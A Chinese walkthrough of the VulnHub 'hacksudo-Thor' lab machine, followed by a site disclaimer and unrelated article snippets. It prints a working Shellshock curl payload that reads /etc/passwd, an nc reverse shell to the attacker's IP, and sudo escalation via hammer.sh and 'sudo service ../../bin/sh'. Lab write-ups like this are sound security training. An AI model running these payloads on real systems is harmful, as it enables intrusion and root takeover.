vulnhub-->hacksudo-Thor靶机详细思路

目录

  • 1. IP探测
  • 2.端口服务扫描
  • 3.网站漏洞扫描
  • 4.目录扫描
  • 5.信息分析
  • 6.破壳漏洞(Shellshock)
    • nmap---漏洞检测
    • CVE-2014-6271
  • 7.nc反弹
  • 8.提权
  • 9.service提权

1. IP探测

┌──(root㉿kali)-[~]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.0.140
Starting arp-scan 1.9.8 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.0.1     b8:3a:08:3b:f9:30       Tenda Technology Co.,Ltd.Dongguan branch
192.168.0.130   08:00:27:4b:48:b0       PCS Systemtechnik GmbH
192.168.0.139   7c:b5:66:a5:f0:a5       Intel Corporate
192.168.0.101   42:fd:92:b5:74:21       (Unknown: locally administered)4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.8: 256 hosts scanned in 1.938 seconds (132.09 hosts/sec). 4 responded
┌──(root㉿kali)-[~]
└─# nmap -Pn 192.168.0.0/24
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:07 EST
Nmap scan report for 192.168.0.1 (192.168.0.1)
Host is up (0.026s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: B8:3A:08:3B:F9:30 (Tenda Technology,Ltd.Dongguan branch)Nmap scan report for 192.168.0.101 (192.168.0.101)
Host is up (0.019s latency).
All 1000 scanned ports on 192.168.0.101 (192.168.0.101) are in ignored states.
Not shown: 1000 closed tcp ports (reset)
MAC Address: 42:FD:92:B5:74:21 (Unknown)Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.00033s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Nmap scan report for 192.168.0.139 (192.168.0.139)
Host is up (0.00038s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 7C:B5:66:A5:F0:A5 (Intel Corporate)Nmap scan report for 192.168.0.140 (192.168.0.140)
Host is up (0.0000040s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  sshNmap done: 256 IP addresses (5 hosts up) scanned in 18.55 seconds

192.168.0.130

2.端口服务扫描

┌──(root㉿kali)-[~]
└─# nmap -p- 192.168.0.130 --min-rate 1000    
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:09 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0025s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 7.81 seconds
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -O 192.168.0.130 --min-rate 1000 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:08 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.00088s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 3736603e26ae233fe18b5d18e7a7c7ce (RSA)
|   256 349a57607d6670d5b5ff4796e0362375 (ECDSA)
|_  256 ae7deefe1dbc994d54453d6116f86c87 (ED25519)
80/tcp open     http    Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.82 seconds

3.网站漏洞扫描

┌──(root㉿kali)-[~]
└─# nmap --script=vuln -p21,22,80 192.168.0.130 --min-rate 10000
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 08:12 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0011s latency).PORT   STATE    SERVICE
21/tcp filtered ftp
22/tcp open     ssh
80/tcp open     http
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /admin_login.php: Possible admin folder
|_  /images/: Potentially interesting directory w/ listing on 'apache/2.4.38 (debian)'
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-internal-ip-disclosure: 
|_  Internal IP Leaked: 127.0.0.1
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-fileupload-exploiter: 
|   
|     Couldn't find a file-type field.
|   
|_    Couldn't find a file-type field.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.0.130
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.0.130:80/
|     Form id: 
|     Form action: customer_login_action.php
|     
|     Path: http://192.168.0.130:80/home.php
|     Form id: 
|     Form action: customer_login_action.php
|     
|     Path: http://192.168.0.130:80/customer_login_action.php
|     Form id: 
|_    Form action: customer_login_action.php
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 32.61 seconds
┌──(root㉿kali)-[~]
└─# nikto -h 192.168.0.130                                      
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.0.130
+ Target Hostname:    192.168.0.130
+ Target Port:        80
+ Start Time:         2024-02-11 08:14:15 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.0.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2024-02-11 08:15:05 (GMT-5) (50 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested*********************************************************************Portions of the server's headers (Apache/2.4.38) are not inthe Nikto 2.1.6 database or are newer than the known string. Would you liketo submit this information (*no server specific data*) to CIRT.netfor a Nikto update (or you may email to sullo@cirt.net) (y/n)? y+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The site uses SSL and the Strict-Transport-Security HTTP header is not defined.
+ The site uses SSL and Expect-CT header is not present.
- Sent updated info to cirt.net -- Thank you!

4.目录扫描

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.130"          _|. _ _  _  _  _ _|_    v0.4.3(_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460Output File: /root/reports/http_192.168.0.130/_24-02-11_08-11-40.txtTarget: http://192.168.0.130/[08:11:40] Starting: 
[08:11:42] 403 -  278B  - /.ht_wsr.txt                                      
[08:11:42] 403 -  278B  - /.htaccess.sample                                 
[08:11:42] 403 -  278B  - /.htaccess.bak1                                   
[08:11:42] 403 -  278B  - /.htaccess_extra
[08:11:42] 403 -  278B  - /.htaccess_orig
[08:11:42] 403 -  278B  - /.htaccess.orig
[08:11:42] 403 -  278B  - /.htaccessOLD2
[08:11:42] 403 -  278B  - /.htaccessOLD                                     
[08:11:42] 403 -  278B  - /.htaccessBAK
[08:11:42] 403 -  278B  - /.html                                            
[08:11:42] 403 -  278B  - /.htm                                             
[08:11:42] 403 -  278B  - /.htaccess_sc
[08:11:42] 403 -  278B  - /.htaccess.save
[08:11:42] 403 -  278B  - /.htpasswd_test
[08:11:42] 403 -  278B  - /.htpasswds                                       
[08:11:42] 403 -  278B  - /.httr-oauth                                      
[08:11:43] 403 -  278B  - /.php                                             
[08:11:51] 302 -    7KB - /admin_home.php  ->  home.php                     
[08:11:51] 200 -  489B  - /admin_login.php                                  
[08:11:59] 403 -  278B  - /cgi-bin/                                         
[08:12:01] 200 -    1KB - /contact.php                                      
[08:12:06] 301 -  314B  - /fonts  ->  http://192.168.0.130/fonts/           
[08:12:08] 200 -  278B  - /header.php                                       
[08:12:08] 200 -    2KB - /home.php                                         
[08:12:09] 301 -  315B  - /images  ->  http://192.168.0.130/images/         
[08:12:09] 200 -  666B  - /images/                                          
[08:12:16] 200 -    3KB - /news.php                                         
[08:12:23] 200 -    4KB - /README.md                                        
[08:12:25] 403 -  278B  - /server-status                                    
[08:12:25] 403 -  278B  - /server-status/                                   Task Completed 
┌──(root㉿kali)-[~]
└─# dirb http://192.168.0.130          -----------------
DIRB v2.22    
By The Dark Raver
-----------------START_TIME: Sun Feb 11 08:14:49 2024
URL_BASE: http://192.168.0.130/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612                                                          ---- Scanning URL: http://192.168.0.130/ ----
+ http://192.168.0.130/cgi-bin/ (CODE:403|SIZE:278)                                 
==> DIRECTORY: http://192.168.0.130/fonts/                                          
==> DIRECTORY: http://192.168.0.130/images/                                         
+ http://192.168.0.130/index.php (CODE:200|SIZE:5357)                               
+ http://192.168.0.130/server-status (CODE:403|SIZE:278)                            ---- Entering directory: http://192.168.0.130/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)---- Entering directory: http://192.168.0.130/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        (Use mode '-w' if you want to scan it anyway)-----------------
END_TIME: Sun Feb 11 08:14:59 2024
DOWNLOADED: 4612 - FOUND: 3

5.信息分析

通过上面一系列的探测,可以得到靶机:192.168.0.130,开放了21(被防火墙过滤),22(ssh服务),80(http服务)
访问80端口页面,看看有什么信息,一个登陆页面,并没有发现什么。

在这里插入图片描述

访问dirsearch,扫出来的目录/admin_login.php,是一个后台登陆的页面,尝试弱密码登陆,不行,还有一个/README.md目录,下载以后,
看到admin/password123账号密码,登陆成功

在这里插入图片描述在这里插入图片描述在这里插入图片描述

在Manage Customers中找到四个用户密码。

在这里插入图片描述

在这里插入图片描述

6.破壳漏洞(Shellshock)

破壳漏洞(Shellshock)是指一个影响Unix和Linux操作系统的严重安全漏洞,它影响了Bash命令解释器。该漏洞使攻击者能够在受影响的系统上执行任意代码,从而可能导致系统被入侵。
Shellshock漏洞的原因是Bash解释器在处理特定的环境变量时存在一个安全漏洞,攻击者可以通过构造恶意的环境变量来执行任意的Shell命令。这个漏洞的危害性很高,因为Bash是许多Unix系统和Linux系统中常用的Shell

得到了账号密码,也没有什么用,一筹莫展的时候,发现http://192.168.0.130/news.php这个目录,源代码中看到亮眼的/cgi-bin/

在这里插入图片描述

访问/cgi-bin目录,状态码403,代表没有权限,那我们扫一下这个目录

在这里插入图片描述

┌──(root㉿kali)-[~]
└─# dirsearch -u "http://192.168.0.130/cgi-bin/"_|. _ _  _  _  _ _|_    v0.4.3                                                            (_||| _) (/_(_|| (_| )                                                                     Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460Output File: /root/reports/http_192.168.0.130/_cgi-bin__24-02-11_08-47-25.txtTarget: http://192.168.0.130/[08:47:25] Starting: cgi-bin/                                                               
[08:48:09] 500 -  611B  - /cgi-bin/shell.sh                                 Task Completed 

nmap—漏洞检测

扫到shell.sh,看看是否有破壳漏洞
nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.0.130--script http-shellshock: http-shellshock 是一个用于检测 Shellshock漏洞的脚本。Shellshock 是一个在 Bash shell 中发现的安全漏洞,允许远程攻击者执行任意代码
┌──(root㉿kali)-[~]
└─# nmap -sV -p80 --script http-shellshock --script-args uri=/cgi-bin/shell.sh 192.168.0.130
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-11 09:07 EST
Nmap scan report for 192.168.0.130 (192.168.0.130)
Host is up (0.0012s latency).PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-shellshock: 
|   VULNERABLE:
|   HTTP Shellshock vulnerability
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2014-6271
|       This web application might be affected by the vulnerability known
|       as Shellshock. It seems the server is executing commands injected
|       via malicious HTTP headers.
|             
|     Disclosure date: 2014-09-24
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169
|       http://seclists.org/oss-sec/2014/q3/685
|_      http://www.openwall.com/lists/oss-security/2014/09/24/10
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:4B:48:B0 (Oracle VirtualBox virtual NIC)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.58 seconds

CVE-2014-6271

直接去GitHub搜CVE-2014-6271,找exp

在这里插入图片描述

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://localhost:8080/cgi-bin/vulnerablelocalhost:靶机IP地址
端口:80
vulnerable:漏洞入口-->shell.shcurl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://192.168.0.130:80/cgi-bin/shell.sh

命令执行成功

┌──(root㉿kali)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" \  http://192.168.0.130/cgi-bin/shell.sh
curl: (3) URL using bad/illegal format or missing URLroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
ftpuser:x:1005:1004::/dev/null:/etc/
thor:x:1001:1001:,,,:/home/thor:/bin/bash
sddsd

7.nc反弹

┌──(root㉿kali)-[~]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'nc -e /bin/bash 192.168.0.140 6666'" \  http://192.168.0.130/cgi-bin/shell.sh
┌──(root㉿kali)-[~]
└─# nc -lvnp 6666                                
listening on [any] 6666 ...
connect to [192.168.0.140] from (UNKNOWN) [192.168.0.130] 56356
python3 -c 'import pty;pty.spawn("/bin/bash")'
bash-4.3$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-4.3$

8.提权

sudo -l 发现可执行文件/home/thor/./hammer.sh,执行,发现输入的命令,会以thor用户执行,所以执行bash,以Thor用户新开一个bash环境。

bash-4.3$ sudo -l
sudo -l
Matching Defaults entries for www-data on HackSudoThor:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser www-data may run the following commands on HackSudoThor:(thor) NOPASSWD: /home/thor/./hammer.shbash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.shHELLO want to talk to Thor?Enter Thor  Secret Key : id
id
Hey Dear ! I am id , Please enter your Secret massage : id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)
Thank you for your precious time!
bash-4.3$ sudo -u thor /home/thor/./hammer.sh
sudo -u thor /home/thor/./hammer.shHELLO want to talk to Thor?Enter Thor  Secret Key : bash
bash
Hey Dear ! I am bash , Please enter your Secret massage : bash
bash
id
id
uid=1001(thor) gid=1001(thor) groups=1001(thor)

9.service提权

python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
thor@HacksudoThor:/usr/lib/cgi-bin$ sudo -l
sudo -l
Matching Defaults entries for thor on HackSudoThor:env_reset, mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser thor may run the following commands on HackSudoThor:(root) NOPASSWD: /usr/bin/cat, /usr/sbin/service

https://gtfobins.github.io/gtfobins/service/

在这里插入图片描述

thor@HacksudoThor:/usr/lib/cgi-bin$ sudo service ../../bin/sh
sudo service ../../bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
proof.txt  root.txt
# cat root.txt
cat root.txt
rooted
# cat proof.txt
cat proof.txt
rooted                                                                                                  ████████                                  ▒▒▒▒▒▒██▒▒▒▒                                ▓▓░░▒▒▓▓  ░░▒▒██                              ██░░▒▒▓▓▒▒▓▓  ░░▒▒██                            ██░░▒▒▓▓▒▒▒▒▒▒▓▓  ░░▒▒██                          ██░░▒▒▓▓▒▒▒▒░░░░▒▒▓▓  ░░▒▒▓▓      ██████            ▓▓░░▒▒▓▓▒▒▒▒░░░░░░░░▒▒▓▓  ░░▒▒▓▓  ▓▓░░▓▓▓▓▓▓          ▓▓▒▒▓▓▒▒▒▒▒▒░░░░░░░░░░░░▓▓  ░░▒▒▓▓░░░░░░▓▓██          ▓▓▓▓▓▓▒▒░░  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒▓▓░░▒▒▒▒██          ▓▓▓▓▓▓▓▓▒▒░░  ▒▒░░░░░░  ░░▒▒▒▒  ░░▒▒▓▓▒▒▓▓░░          ██▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▒▒  ░░▒▒▓▓              ██▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▒▒  ░░▒▒██            ██▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒██          ▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░▒▒▓▓  ░░▒▒██        ▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒▒░░░░░░░░░░▒▒▓▓  ░░▒▒██      ▓▓▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒██    ▓▓▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░  ░░▒▒▓▓  ░░▒▒██  ▓▓░░▓▓▓▓▓▓▓▓▒▒▒▒  ▒▒░░░░░░░░░░▒▒▓▓  ▓▓▓▓██▓▓░░░░░░▓▓▓▓▓▓▓▓▒▒░░  ▒▒░░░░░░  ▒▒▒▒▓▓  ████▓▓░░░░░░▒▒▒▒▓▓▓▓▓▓▓▓▒▒░░  ▒▒░░  ▒▒▒▒▓▓▓▓▓▓░░████░░░░░░▒▒▒▒██  ██▓▓▓▓▒▒▒▒▒▒▒▒▒▒▒▒▒▒▓▓▓▓██░░▒▒████  ░░░░▒▒▒▒██      ██▓▓▓▓▓▓▒▒░░  ▒▒▓▓▓▓██░░▒▒██  ░░        ░░            ██░░░░░░▒▒▒▒██          ██▓▓▓▓▓▓▒▒▒▒▓▓▓▓██░░▒▒██    ░░  ░░  ░░    ██  ░░░░▒▒▒▒▓▓              ▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░▒▒██      ░░              ░░      ██  ░░░░▒▒▒▒▓▓                ░░▓▓▓▓▓▓▓▓▓▓░░▒▒██        ░░                      ██  ░░░░▒▒▒▒▓▓                    ░░▓▓▓▓▓▓░░▒▒██          ██  ░░░░▒▒▒▒██                        ░░██▓▓██▓▓            ▓▓  ░░░░▒▒▒▒██                                                ██  ░░░░▒▒▒▒██                                                  ▓▓  ░░░░▒▒▒▒██                                                    ▓▓  ░░░░▒▒▒▒██                                                      ░░▓▓░░░░░░▒▒▒▒██                                                        ░░▓▓░░░░░░▒▒▒▒▓▓                                                          ░░▒▒░░░░░░▒▒▒▒▓▓                                                            ▒▒░░░░░░▒▒▒▒▓▓                                                              ██░░░░░░▒▒▒▒▓▓                                                                ██  ░░░░▒▒▒▒▓▓                                                                  ██  ░░░░▒▒▒▒▓▓                                                                    ██  ░░░░▒▒▒▒▓▓                                                                      ▓▓  ░░░░▒▒▒▒▓▓                                                                        ██  ░░░░▒▒▒▒▒▒                                                                          ▓▓░░░░░░▒▒▒▒██                                                                            ████▓▓▓▓░░▒▒▒▒██                                                                              ██▒▒  ▒▒▓▓▓▓▒▒██                                                                                ▓▓▒▒  ▒▒▒▒▓▓██                                                                                  ▓▓▒▒▒▒▒▒▓▓██                                                                                    ██▓▓▓▓▓▓▓▓██                                                                                    ░░▓▓▓▓▓▓▓▓░░                                                                                    # 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/678612.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

国产航顺HK32F030M: 超声波测距模块串口通信数据接收与处理

参考代码 /************************************************************************************************** * file usart_async_tx_no_int_rx_rxneint.c * brief 异步串口通信例程, 通过查询TXE标志发送数据,通过RXNE中断接收数据,当中断接收到数据后会将 * …

2月11日作业

1、请使用递归实现n! 代码&#xff1a; #include<stdio.h> #include<string.h> #include<stdlib.h>int fun(int n) {if(n1)return 1;else{return n*fun(n-1);} }int main(int argc, const char *argv[]) {int n;printf("please enter n:");scanf…

【浙大版《C语言程序设计实验与习题指导(第4版)》】实验7-1-6 求一批整数中出现最多的个位数字(附测试点)

定一批整数&#xff0c;分析每个整数的每一位数字&#xff0c;求出现次数最多的个位数字。例如给定3个整数1234、2345、3456&#xff0c;其中出现最多次数的数字是3和4&#xff0c;均出现了3次。 输入格式&#xff1a; 输入在第1行中给出正整数N&#xff08;≤1000&#xff0…

cesium系列篇:Entity vs Primitive 源码解析(从Entity到Primitive)02

上篇文章中&#xff0c;我们介绍了使用viewer.entities.add添加entity之后的信号传递以及最后entity对象被传递到GeometryVisualizer&#xff1b; 这篇文章&#xff0c;我们则介绍如何在逐帧渲染的过程中根据GeometryVisualizer中的entity对象创建相应的primitive 这是下文中…

vue3 之 组合式API—模版引用

模版引用的概念 通过ref标识获取真实的dom对象或者组件实例对象 如何使用&#xff08;以获取dom为例 组件同理&#xff09; 1️⃣调用ref函数生成一个ref对象 2️⃣通过ref标识绑定ref对象到标签 dom中使用 父组件中可以看到打印出来proxy里面只有一个属性&#xff0c;其他…

【Linux】学习-文件的软硬链接

文件的软硬链接 在上一篇拓展篇—文件系统中我们介绍过文件元的概念&#xff1a; 我们在使用ls -l命令查看文件元信息的时候&#xff0c;有一个硬链接数&#xff0c;说明文件的硬链接数属于文件的属性之一&#xff0c;那么硬链接究竟是什么呢&#xff1f;软链接又是什么呢&…

Spring AI - 使用向量数据库实现检索式AI对话

Spring AI - 使用向量数据库实现检索式AI对话 Spring AI 并不仅限于针对大语言模型对话API进行了统一封装&#xff0c;它还可以通过简单的方式实现LangChain的一些功能。本篇将带领读者实现一个简单的检索式AI对话接口。 一、需求背景 在一些场景下&#xff0c;我们想让AI根据…

华为机考入门python3--(10)牛客10-字符个数统计

分类&#xff1a;字符 知识点&#xff1a; 字符的ASCII码 ord(char) 题目来自【牛客】 def count_unique_chars(s): # 创建一个空集合来保存不同的字符 unique_chars set() # 遍历字符串中的每个字符 for char in s: # 将字符转换为 ASCII 码并检查是否在范围内 #…

KEIL-MDK的时间戳之time.h 结合gd32f1的RTC应用

KEIL-MDK的时间戳之time.h 的应用 1 时间戳介绍 现在物联网产品的在进行通讯的时候&#xff0c;需要加入时间戳的这个信息参数&#xff0c;方便服务器和产品之间交换时间信息。 时间戳是计算机系统中用来表示日期和时间的一种方式&#xff0c;通常是一个数字或者一串字符&am…

[优雅的面试] 进程 线程 协程分的清

面试官大佬&#xff1a;小伙子&#xff0c;咱今儿个先聊聊进程线程这块的知识哈&#xff0c;就先说说进程吧。 我&#xff1a;存储在硬盘中的代码是静态文件&#xff0c;运行中的程序被称为进程。进程之间数据是相互隔离的。 一般说来&#xff0c;一个进程并不是自始至终连续不…

Vits2.3-Extra-v2:中文特化,如何训练及推理(新手教程)

环境&#xff1a; Vits2.3-Extra-v2:中文特化修复版 auto_DataLabeling 干声10分钟左右.wav 问题描述&#xff1a; Vits2.3-Extra-v2:中文特化&#xff0c;如何训练及推理&#xff08;新手教程&#xff09; 解决方案&#xff1a; 一、准备数据集 切分音频 本次音频数据…

管理就是闭环

管理是什么&#xff1f;这个问题没有一个统一的答案。本文提供一个管中窥豹的答案&#xff1a;管理就是闭环。 作为基层管理者&#xff0c;日常管理事务&#xff0c;一个是目标闭环&#xff0c;一个是执行闭环。这分别对应敏捷PO和Scrum Master的职责。PO的职责是确保目标闭环&…

猫头虎分享已解决Bug ‍ || TypeError: props is not a function (React)

博主猫头虎的技术世界 &#x1f31f; 欢迎来到猫头虎的博客 — 探索技术的无限可能&#xff01; 专栏链接&#xff1a; &#x1f517; 精选专栏&#xff1a; 《面试题大全》 — 面试准备的宝典&#xff01;《IDEA开发秘籍》 — 提升你的IDEA技能&#xff01;《100天精通鸿蒙》 …

05.坐标系

1. 坐标系原点 坐标系原点就是屏幕/窗口的左上角&#xff0c;X向右增长&#xff0c;Y向下增长。 2.设置控件位置 设置控件位置&#xff0c;就相当于是需要指定控件的坐标&#xff0c;对于该控件来说&#xff0c;其坐标原点是其父窗口/父控件的左上角。 设置方法就是通过控件的…

创新S3存储桶检索:Langchain社区S3加载器搭载OpenAI API

在瞬息万变的数据存储和处理领域&#xff0c;将高效的云存储解决方案与先进的 AI 功能相结合&#xff0c;为处理大量数据提供了一种变革性的方法。本文演示了使用 MinIO、Langchain 和 OpenAI 的 GPT-3.5 模型的实际实现&#xff0c;重点总结了存储在 MinIO 存储桶中的文档。 …

leetcode:62.不同路径

动态规划 注意&#xff1a;用深搜或者广搜会超时 dp含义dp[i,j]&#xff1a;从&#xff08;0&#xff0c;0&#xff09;到&#xff08;i&#xff0c;j&#xff09;的路径个数 递推公式&#xff1a;dp[i][j] dp[i-1][j] dp[i][j-1] 初始化&#xff1a;for(i 0,i<m,i) …

[职场] 面试被问优点的回答参考 #知识分享#其他#学习方法

面试被问优点的回答参考 当面试官问你最大的优点是什么&#xff1f;回答1&#xff1a; 我擅长合理地安排时间&#xff0c; 作为助理&#xff0c; 我的杂事很多&#xff0c; 总是觉得手边有做不完的事情&#xff0c; 所以我特别注意时间管理&#xff0c; 这样才能高效地工作&am…

继承

1.继承的作用 有些类与类之间存在特殊关系&#xff0c;下级别的成员除了拥有上一级别的共性&#xff0c;还有自己的特性。 这个时候我们就可以考虑利用继承技术&#xff0c;减少重复代码。 总结&#xff1a; 继承的好处&#xff1a;可以减少重复的代码 class A : public B;…

猫头虎分享已解决Bug || KeyError: ‘The truth value of a Series is ambiguous‘

博主猫头虎的技术世界 &#x1f31f; 欢迎来到猫头虎的博客 — 探索技术的无限可能&#xff01; 专栏链接&#xff1a; &#x1f517; 精选专栏&#xff1a; 《面试题大全》 — 面试准备的宝典&#xff01;《IDEA开发秘籍》 — 提升你的IDEA技能&#xff01;《100天精通鸿蒙》 …

EasyExcel动态列导出

测试代码地址&#xff1a;https://gitee.com/wangtianwen1996/cento-practice/tree/master/src/test/java/com/xiaobai/easyexcel/dynamiccolumn 官方文档&#xff1a;https://easyexcel.opensource.alibaba.com/docs/2.x/quickstart/write 一、实现方式 1、根据需要导出的列…